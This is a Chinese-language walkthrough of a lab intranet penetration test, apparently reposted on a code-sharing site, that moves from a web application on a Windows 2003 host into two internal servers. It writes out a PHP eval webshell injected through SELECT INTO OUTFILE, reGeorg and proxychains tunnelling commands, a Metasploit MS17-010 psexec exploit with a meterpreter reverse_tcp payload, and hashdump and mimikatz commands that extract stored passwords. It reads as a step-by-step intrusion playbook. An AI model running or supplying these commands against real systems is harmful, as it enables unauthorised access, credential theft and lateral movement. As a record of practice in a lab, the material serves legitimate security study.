一次內網滲透詳細過程


前言

目標:給出一個目標機ip,得到該服務器權限,並通過該ip滲透至內網控制內網的兩台服務器

攻擊機:kali  (192.168.31.51)

目標機:windows 2003  (192.168.31.196)

1.暴力破解

在前台“會員登陸”發現用戶的賬號

使用burpsuite爆破出弱口令密碼

成功登陸用戶界面

2.SQL注入

在網站首頁發現SQL注入點

使用sqlmap工具獲得管理員賬號和密碼

3.越權添加網站后台超管

 進入kefu管理員后台,發現是普通管理員權限,很多操作受限制

通過抓包發現可以修改權限,將submanage”修改為“manage”,然后放包

成功將“普通管理員”權限修改為“超級管理員”,然后再抓包發現“包”中的權限還是“submanage,繼續修改為“manage

修改成功,【在這個網站中,普通管理員想要操作不受限制,沒次操作都可抓包修改為manage”,所以在這里我利用此漏洞直接添加一個超管,便於操作】

成功登陸我剛新建的超管let

4.getshell

通過ip訪問此網站,發現該網站存在“探針”,可以查看到當前網站目錄

通過sql注入出的管理員賬戶密碼,登陸“data”管理員后台,發現此管理員有執行sql語句的權限,利用數據庫命令,將“php一句話”寫入到網站根目錄下

例如:select "<?php eval($_POST['pass']);?>" into outfile "C:/UPUPW_AP5.2/htdocs/wlt.php"

 

 成功用“菜刀”連接網站后台

 

5.添加系統賬戶【超管】

 上傳一個php大馬”

 

利用“大馬”執行命令,創建系統超管賬戶

 

掃描發現3389端口開啟,遠程連接到系統

 

6.隧道代理-端口轉發

開啟reGeorg監聽:python reGeorgSocksProxy.py -p 9527 -u http://192.168.31.196/tunnel.php

 

使用proxychains工具

 

設置代理,先vi /etc/proxychains.conf編輯,再將第二行命令運行【復制相關文件,需要調用】,最后添加firefoxnmap等用到的工具

 

取消圖中的注釋

 

添加通道5,代理監聽的端口,例如9527

 

使用nmap工具查詢開放的端口

 

通過用戶想要使用的應用程序運行ProxyChains,例如,啟動msfconsole  

執行命令proxychains msfconsole

 

如下圖所示,輸入命令執行腳本便可連接到目標主機

1set payload windows/x64/meterpreter/reverse_tcp

或者set payload windows/meterpreter/reverse_tcp //針對目標機器使用的系統版本,目標機器32位就使用32

2set LHOST 本機IP

3use exploit/windows/smb/ms17_010_psexec腳本

4set RHOST 目標IP

5run

如下圖所示,表示成功連接到了目標主機,可輸入相應的命令來達到目的

 

代理獲取系統賬戶和密碼

獲取加密密碼

例如輸入命令:run post/windows/gather/smart_hashdump,可以獲取目標主機的賬戶和密碼

 

獲取明文密碼

利用mimikatz獲取明文密碼,命令如下【我只用了兩條命令】:

meterpreter > load mimikatz  #加載mimikatz

meterpreter > msv #獲取hash

meterpreter > kerberos #獲取明文

meterpreter >ssp   #獲取明文信息

meterpreter > wdigest #獲取系統賬戶信息

meterpreter >mimikatz_command -f a::   #必須要以錯誤的模塊來讓正確的模塊顯示

meterpreter >mimikatz_command -f hash::   #獲取目標 hash

meterpreter > mimikatz_command -f samdump::hashes

meterpreter > mimikatz_command -f sekurlsa::searchPasswords

 

開啟3389端口

run getgui -e命令開啟3389端口

遠程連接

使用遠程連接,連接目標主機:proxychains rdesktop 192.168.238.129proxychains rdesktop 192.168.238.130

 

 

 

 

 

 

 

 

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM